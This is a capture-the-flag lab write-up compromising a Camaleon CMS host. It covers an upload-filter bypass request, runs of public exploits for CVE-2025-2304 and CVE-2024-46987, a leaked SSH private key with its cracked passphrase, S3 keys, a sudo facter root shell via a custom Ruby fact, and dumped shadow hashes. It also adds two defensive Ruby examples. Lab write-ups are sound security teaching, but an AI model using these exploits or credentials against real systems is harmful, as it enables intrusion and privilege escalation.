[Season10] Facts WP

Recon

Port Scan

Port 80 is a web service, and port 54321 is a MinIO instance.

PORT      STATE SERVICE REASON         VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 nginx 1.26.3 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.26.3 (Ubuntu)
|_http-title: Did not follow redirect to http://facts.htb/
54321/tcp open unknown syn-ack ttl 62
| fingerprint-strings:
| GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 400 Bad Request
| Accept-Ranges: bytes
| Content-Length: 276
| Content-Type: application/xml
| Server: MinIO
| Strict-Transport-Security: max-age=31536000; includeSubDomains
| Vary: Origin
| X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
| X-Amz-Request-Id: 1891DEF03210FD0F
| X-Content-Type-Options: nosniff
| X-Xss-Protection: 1; mode=block
| Date: Sat, 07 Feb 2026 05:14:11 GMT
| <?xml version="1.0" encoding="UTF-8"?>
| <Error><Code>InvalidRequest</Code><Message>Invalid Request (invalid argument)</Message><Resource>/</Resource><RequestId>1891DEF03210FD0F</RequestId><HostId>dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8</HostId></Error>
| HTTPOptions:
| HTTP/1.0 200 OK
| Vary: Origin
| Date: Sat, 07 Feb 2026 05:14:12 GMT
|_ Content-Length: 0

Directory Brute Forcing

Start with a feroxbuster scan to see what turns up.

root@cloudcone ~ [1]# feroxbuster -u http://facts.htb -n -t 10

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.13.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://facts.htb/
🚩 In-Scope Url │ facts.htb
🚀 Threads │ 10
📖 Wordlist │ /root/SecLists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.13.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🚫 Do Not Recurse │ true
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200 GET 124l 552w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 121l 443w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
302 GET 0l 0w 0c http://facts.htb/admin => http://facts.htb/admin/login
200 GET 172l 889w 19556c http://facts.htb/cats-attachment
404 GET 114l 371w 4836c http://facts.htb/fonts.googleapis.com/
200 GET 160l 733w 14975c http://facts.htb/cute-animals
200 GET 69l 448w 30396c http://facts.htb/randomfacts/logopage2.png
200 GET 271l 1166w 19187c http://facts.htb/search
200 GET 8l 11w 183c http://facts.htb/rss
404 GET 114l 371w 4836c http://facts.htb/fonts.googleapis.com/css
200 GET 66l 519w 44082c http://facts.htb/randomfacts/primary-question-mark.png
200 GET 8l 2294w 169312c http://facts.htb/assets/themes/camaleon_first/assets/css/main-41052d2acf5add707cadf8d1c12a89a9daca83fb8178fdd5c9105dc6c566d25d.css
200 GET 172l 913w 19727c http://facts.htb/first-impressions
200 GET 172l 920w 19730c http://facts.htb/animal-ejected
200 GET 178l 965w 21754c http://facts.htb/dolphin-fact
200 GET 64l 988w 206540c http://facts.htb/assets/camaleon_cms/image-not-found-fc3c0e66dc61abf74010e63ef65a2e23c4cb40a3320408f2711f82fdc22b503f.png
200 GET 166l 833w 17324c http://facts.htb/anne-frank
200 GET 172l 925w 19677c http://facts.htb/dark-chocolate
200 GET 160l 773w 15365c http://facts.htb/finland-happiest
200 GET 160l 721w 15004c http://facts.htb/animal-sweat
200 GET 9958l 40904w 330571c http://facts.htb/assets/themes/camaleon_first/assets/js/main-2d9adb006939c9873a62dff797c5fc28dff961487a2bb550824c5bc6b8dbb881.js
200 GET 281l 1177w 19593c http://facts.htb/page
200 GET 0l 0w 0c http://facts.htb/ajax
200 GET 114l 371w 4836c http://facts.htb/404
200 GET 129l 132w 3508c http://facts.htb/sitemap
200 GET 21l 101w 6444c http://facts.htb/captcha
200 GET 151l 507w 11308c http://facts.htb/post
200 GET 1l 4w 73c http://facts.htb/up
200 GET 1l 2w 33c http://facts.htb/robots
200 GET 114l 574w 7918c http://facts.htb/500
200 GET 114l 532w 6685c http://facts.htb/400

This gives us the admin login URL: http://facts.htb/admin/login

Web

Visiting the admin login page, we find that account registration is open. After registering an account and logging in, we can see an avatar-upload endpoint.

Submitting the formats and media_formats fields with empty values disables the extension filter, so a file of any type can be uploaded.

POST /admin/media/upload?actions=true HTTP/1.1
Host: facts.htb
Content-Length: 969
Pragma: no-cache
Cache-Control: no-cache
X-CSRF-Token: 21PghifHNAksiXNYfB9rRC-bhqXLawpXxMA76a2CDE6-pVLZeO3TJh_IDrTxsDvnGfR5ZUW2DY7N6hS4gjqO8A
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryte6HKGQrv2dLGkHg
Origin: http://facts.htb
Referer: http://facts.htb/admin/profile/edit
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: auth_token=mhfr4ue4_NKMIRbhLgk6ng&Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F144.0.0.0+Safari%2F537.36&10.10.17.50; _factsapp_session=dqWYcrszAmRNF2JxeC8LH3JWACMMLEGuDklWkIrEc34tuWhkrb3xeSxfGN6cXiZ2A2b%2BVjqvp4m3b00srvHZ17bJJktE%2B4QJDXGbQo5eoYGpKzWH%2BsL3JO%2Bcr%2BAm7oWK5l7fKQn8O%2FlMjwJj7L1NQNCQB9KpWg5WS1oX5DyMOSbujdaLRKNma9H4ra9jek0p9LPBdkIVia4jUv%2FQuaHe5J2n2Yp%2B03AE1xHdxgo4xvOKH%2FvTcENIEU67nWpWjz0c%2Fza2CmaXmN9IgvHP%2FS1D%2FS017%2BXcXeiGr1nGI5bUmziGFt7YM2oE%2BFNGIkXo%2BUyqS%2FNpQXG%2BGZBJI%2FyGL84ONKgcgt88HdPFtrXOgqtxqaebhSEyFn5YwN0%3D--w9fuqewA7m43l2%2Bg--wvpZDn46maGTDhAflR4RBw%3D%3D
Connection: keep-alive

------WebKitFormBoundaryte6HKGQrv2dLGkHg
Content-Disposition: form-data; name="file_upload"; filename="konata.html"
Content-Type: image/jpeg

1

------WebKitFormBoundaryte6HKGQrv2dLGkHg
Content-Disposition: form-data; name="versions"


------WebKitFormBoundaryte6HKGQrv2dLGkHg
Content-Disposition: form-data; name="thumb_size"


------WebKitFormBoundaryte6HKGQrv2dLGkHg
Content-Disposition: form-data; name="formats"


------WebKitFormBoundaryte6HKGQrv2dLGkHg
Content-Disposition: form-data; name="media_formats"


------WebKitFormBoundaryte6HKGQrv2dLGkHg
Content-Disposition: form-data; name="dimension"


------WebKitFormBoundaryte6HKGQrv2dLGkHg
Content-Disposition: form-data; name="private"


------WebKitFormBoundaryte6HKGQrv2dLGkHg
Content-Disposition: form-data; name="folder"

/
------WebKitFormBoundaryte6HKGQrv2dLGkHg
Content-Disposition: form-data; name="skip_auto_crop"

true
------WebKitFormBoundaryte6HKGQrv2dLGkHg--

However, the backend is written in Ruby, so this upload is of little use on its own. The footer of the admin panel shows the CMS name and version, so the next step is to look for CVEs.
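The upload bypass above comes from trusting a client-supplied allowlist: when the formats field arrives empty, nothing is filtered. The following Ruby snippet is an added illustration of that bug class and its fix, written for this writeup; it is not Camaleon CMS's code. The AVATAR_FORMATS allowlist, the magic-byte table and the function names are constructed for the example.

```ruby
require 'set'

# Constructed server-side allowlist for avatar uploads (assumption for this example).
AVATAR_FORMATS = Set.new(%w[jpg jpeg png gif]).freeze

def extension_of(filename)
  File.extname(filename.to_s).delete_prefix('.').downcase
end

# Weak check: the allowed extensions are taken from the request
# (the "formats" field). A blank list is treated as "no restriction",
# which is exactly what an empty formats/media_formats field exploits.
def weak_upload_allowed?(filename, client_formats)
  allowed = client_formats.to_s.split(',').map(&:strip).reject(&:empty?)
  return true if allowed.empty? # the bug: empty list switches the filter off
  allowed.include?(extension_of(filename))
end

# Magic bytes for the allowed image types (first bytes of each format).
MAGIC = {
  'jpg'  => "\xFF\xD8\xFF".b,
  'jpeg' => "\xFF\xD8\xFF".b,
  'png'  => "\x89PNG\r\n\x1A\n".b,
  'gif'  => "GIF8".b
}.freeze

# Hardened check: the allowlist is fixed on the server, the client-supplied
# field is ignored entirely, and the file content must match the extension.
def hardened_upload_allowed?(filename, content, _client_formats = nil)
  ext = extension_of(filename)
  return false unless AVATAR_FORMATS.include?(ext)
  content.b.start_with?(MAGIC[ext])
end

if __FILE__ == $PROGRAM_NAME
  # The request from the writeup: konata.html with an empty formats field.
  puts "weak:     #{weak_upload_allowed?('konata.html', '')}"
  puts "hardened: #{hardened_upload_allowed?('konata.html', '1', '')}"
end
```

The hardened version also rejects a correctly named file whose bytes are not an image, which closes the polyglot variant of the same problem.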

CVE-2025-2304 Privilege Escalation

Searching for Camaleon CMS v2.9.0 shows that this version is affected by CVE-2025-2304.

We use Alien0ne/CVE-2025-2304: Authenticated privilege escalation in Camaleon CMS v2.9.0 via improper parameter handling in the updated_ajax endpoint.

l1nk@kali-wsl ~/t/CVE-2025-2304 (main)> python3 exploit.py -u http://facts.htb -U l1nk -P l1nk -e                                                                                              
[+]Camaleon CMS Version 2.9.0 PRIVILEGE ESCALATION (Authenticated)
[+]Login confirmed
User ID: 5
Current User Role: client
[+]Loading PPRIVILEGE ESCALATION
User ID: 5
Updated User Role: admin
[+]Extracting S3 Credentials
s3 access key: AKIADF43831764777DB0
s3 secret key: 1P7PNW0WkYJxcc5LO9zZL4U6a3Ob2U68XTOWOepJ
s3 endpoint: http://localhost:54321
[+]Reverting User Role

The same S3 information can also be viewed after login at /admin/settings/site. Using the S3 access key and secret key obtained above, we retrieve an SSH private key.

export AWS_ACCESS_KEY_ID=AKIADF43831764777DB0
export AWS_SECRET_ACCESS_KEY=1P7PNW0WkYJxcc5LO9zZL4U6a3Ob2U68XTOWOepJ
export AWS_DEFAULT_REGION=us-east-1
export AWS_ENDPOINT_URL=http://$IP:54321
aws s3 ls


root@cloudcone ~/workspace# aws s3 ls s3://internal/.ssh/
2026-02-07 04:24:18 82 authorized_keys
2026-02-07 04:24:18 464 id_ed25519

root@cloudcone ~/workspace# aws s3 sync s3://internal/.ssh/ .
download: s3://internal/.ssh/authorized_keys to ./authorized_keys
download: s3://internal/.ssh/id_ed25519 to ./id_ed25519

root@cloudcone ~/workspace# cat id_ed25519
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABDvLOF5Go
dZRwjEQpG2lsb9AAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIN2LDLdlLXk4rxsV
3mD4qZCSgAqF5SGOcngtgBCfLi05AAAAoN8OmCb67waKpmizk7F+OvQ01qYcVOqOBpT1og
zGTcBKrWbJotY01TsPvJeXjaw2PoxFRTtCFen9LI2bElqqivRWoqt/5LetMXBE9D7f+hWX
mTV1/19kefeAZe714/bHIRbEsv1nffowTbbRJwRSLAR+rh5E4Cb1efLEjzPAvPHA6o++dS
FPWVn51GFhDLzzKbhPjd/in1GhtVPPpZ4uhpw=
-----END OPENSSH PRIVATE KEY-----

Logging in as root with this key fails, so it apparently does not belong to root; we need a way to find other usernames.

CVE-2024-46987 Arbitrary File Read & User Flag

Another CVE also applies here and gives arbitrary file read: Goultarde/CVE-2024-46987: This Python PoC exploits CVE-2024-46987, a Path Traversal bug in Camaleon CMS 2.8.0 < 2.8.2 (work on 2.9.0). It allows authenticated users to read sensitive server files via the MediaController. Intended for authorized security auditing and educational research only.

First we read /etc/passwd to see which users exist.

l1nk@kali-wsl ~/t/CVE-2024-46987 (main)> python3 CVE-2024-46987.py -u http://facts.htb -l l1nk2 -p l1nk2 /etc/passwd                                                                               
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
usbmux:x:100:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:102:102::/nonexistent:/usr/sbin/nologin
systemd-resolve:x:992:992:systemd Resolver:/:/usr/sbin/nologin
pollinate:x:103:1::/var/cache/pollinate:/bin/false
polkitd:x:991:991:User for polkitd:/:/usr/sbin/nologin
syslog:x:104:104::/nonexistent:/usr/sbin/nologin
uuidd:x:105:105::/run/uuidd:/usr/sbin/nologin
tcpdump:x:106:107::/nonexistent:/usr/sbin/nologin
tss:x:107:108:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:108:109::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:989:989:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
trivia:x:1000:1000:facts.htb:/home/trivia:/bin/bash
william:x:1001:1001::/home/william:/bin/bash
_laurel:x:101:988::/var/log/laurel:/bin/false

Trying the user home directories yields the user flag.

l1nk@kali-wsl ~/t/CVE-2024-46987 (main)> python3 CVE-2024-46987.py -u http://facts.htb -l l1nk2 -p l1nk2 /home/william/user.txt                                                                    
bc66c50d3e0b6c665bd2e090b9540e99

Root Flag

Trying to log in over SSH with the private key, we find it is passphrase-protected, so we crack the passphrase with John.

ssh2john id_ed25519 > tmp
john --wordlist=/usr/share/wordlists/rockyou.txt tmp

The passphrase is dragonballz, and the key logs us in over SSH as the user trivia.

Checking sudo privileges reveals a tool that can be abused.

trivia@facts:~$ sudo -l
Matching Defaults entries for trivia on facts:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User trivia may run the following commands on facts:
(ALL) NOPASSWD: /usr/bin/facter

trivia@facts:~$ /usr/bin/facter -h
Usage
=====

facter [options] [query] [query] [...]

Options
=======
[--color] Enable color output.
[--no-color] Disable color output.
-c [--config] The location of the config file.
[--custom-dir] A directory to use for custom facts.
-d [--debug] Enable debug output.
[--external-dir] A directory to use for external facts.
[--hocon] Output in Hocon format.
-j [--json] Output in JSON format.
-l [--log-level] Set logging level. Supported levels are: none, trace, debug, info, warn, error, and fatal.
[--no-block] Disable fact blocking.
[--no-cache] Disable loading and refreshing facts from the cache
[--no-custom-facts] Disable custom facts.
[--no-external-facts] Disable external facts.
[--no-ruby] Disable loading Ruby, facts requiring Ruby, and custom facts.
[--trace] Enable backtraces for custom facts.
[--verbose] Enable verbose (info) output.
[--show-legacy] Show legacy facts when querying all facts.
-y [--yaml] Output in YAML format.
[--strict] Enable more aggressive error reporting.
-t [--timing] Show how much time it took to resolve each fact
[--sequential] Resolve facts sequentially
[--http-debug] Whether to write HTTP request and responses to stderr. This should never be used in production.
-p [--puppet] Load the Puppet libraries, thus allowing Facter to load Puppet-specific facts.
-v [--version] Print the version
[--list-block-groups] List block groups
[--list-cache-groups] List cache groups
-h [--help] Help for all arguments

This tool can run Ruby code (custom facts loaded from --custom-dir), so spawning a shell from a custom fact gives us root.

trivia@facts:~$ mkdir /tmp/exploit
trivia@facts:~$ echo 'exec("/bin/bash")' > /tmp/exploit/tmp.rb
trivia@facts:~$ sudo /usr/bin/facter -p --custom-dir /tmp/exploit
[2026-02-07 07:23:54.785180 ] ERROR Facter - Could not load puppet gem, got cannot load such file -- puppet
root@facts:/home/trivia# cat /root/root.txt
dc9f0389c361a9a4d26113d4154a39f5
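The root cause here is a sudo rule that grants facter with unconstrained arguments, so --custom-dir can point at a user-writable directory. The Ruby script below is an added example, not part of the writeup, that audits sudoers-style rules for this pattern; the sample sudoers text is constructed from the sudo -l output above, and the CODE_LOADING_FLAGS table is an assumption limited to what the page shows for facter.

```ruby
# Binaries whose command-line options load user-supplied code
# (constructed table; facter --custom-dir is the case on this box).
CODE_LOADING_FLAGS = {
  '/usr/bin/facter' => ['--custom-dir', '--external-dir']
}.freeze

# Constructed sample modelled on the sudo -l output above.
SAMPLE_SUDOERS = <<~SUDOERS
  # constructed sample
  Defaults env_reset, mail_badpass, use_pty
  trivia ALL=(ALL) NOPASSWD: /usr/bin/facter
  william ALL=(ALL) NOPASSWD: /usr/bin/facter ""
  trivia ALL=(root) /usr/bin/facter
SUDOERS

Rule = Struct.new(:user, :runas, :nopasswd, :command, :args)

# user HOST=(runas) TAG: command [args...]
RULE_RE = /\A(?<user>\S+)\s+\S+\s*=\s*(?:\((?<runas>[^)]*)\)\s*)?(?<tags>(?:\w+:\s*)*)(?<cmd>.+)\z/

# Parses user specification lines; comments and Defaults lines are skipped.
def parse_sudoers(text)
  text.each_line.map(&:strip)
      .reject { |l| l.empty? || l.start_with?('#', 'Defaults') }
      .filter_map do |line|
    m = RULE_RE.match(line) or next
    cmd, *args = m[:cmd].strip.split(/\s+/)
    # sudoers runs commands as root when no runas list is given
    Rule.new(m[:user], m[:runas] || 'root', m[:tags].include?('NOPASSWD'), cmd, args)
  end
end

# A rule is risky when it is passwordless, the binary can load code, and the
# arguments are unconstrained. A trailing "" in sudoers pins the command to
# "no arguments", which removes the --custom-dir route.
def risky_rules(text)
  parse_sudoers(text).select do |r|
    r.nopasswd && r.args.empty? && CODE_LOADING_FLAGS.key?(r.command)
  end
end

# Human-readable findings with the suggested hardened rule.
def report(text)
  risky_rules(text).map do |r|
    flags = CODE_LOADING_FLAGS[r.command].join(', ')
    "#{r.user} may run #{r.command} as #{r.runas} with any arguments; " \
    "#{flags} load user-controlled code. Pin it: " \
    "#{r.user} ALL=(#{r.runas}) NOPASSWD: #{r.command} \"\""
  end
end

puts report(SAMPLE_SUDOERS) if __FILE__ == $PROGRAM_NAME
```

Only the first trivia rule is flagged: william's rule pins the arguments with "", and the third rule still prompts for a password. On a real host the input would be /etc/sudoers plus /etc/sudoers.d/*, read as root.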

Hash

root:$y$j9T$7gs6EMa6c.zpFgKM3Grtz.$q8L7RyD.tdOf9DEhsqmEYBdKBrmxJ60ItpltO/x2nSB:20342:0:99999:7:::
daemon:*:20003:0:99999:7:::
bin:*:20003:0:99999:7:::
sys:*:20003:0:99999:7:::
sync:*:20003:0:99999:7:::
games:*:20003:0:99999:7:::
man:*:20003:0:99999:7:::
lp:*:20003:0:99999:7:::
mail:*:20003:0:99999:7:::
news:*:20003:0:99999:7:::
uucp:*:20003:0:99999:7:::
proxy:*:20003:0:99999:7:::
www-data:*:20003:0:99999:7:::
backup:*:20003:0:99999:7:::
list:*:20003:0:99999:7:::
irc:*:20003:0:99999:7:::
_apt:*:20003:0:99999:7:::
nobody:*:20003:0:99999:7:::
systemd-network:!*:20003::::::
usbmux:!:20003::::::
systemd-timesync:!*:20003::::::
messagebus:!:20003::::::
systemd-resolve:!*:20003::::::
pollinate:!:20003::::::
polkitd:!*:20003::::::
syslog:!:20003::::::
uuidd:!:20003::::::
tcpdump:!:20003::::::
tss:!:20003::::::
landscape:!:20003::::::
fwupd-refresh:!*:20003::::::
sshd:!:20338::::::
trivia:$y$j9T$1fYkuzD9.m5y7SwWSTUqh/$hb29dYfEthOUaEZr8D1GriIfSkeu8YeiI2WWxMmoiG0:20342:0:99999:7:::
william:$y$j9T$L/LMpuHMall7H5uzpS/mL1$L1EJ9y7BdcE10UIxBSow2eStbt1SefLToaTh4hDacD2:20461:0:99999:7:::
_laurel:!:20479::::::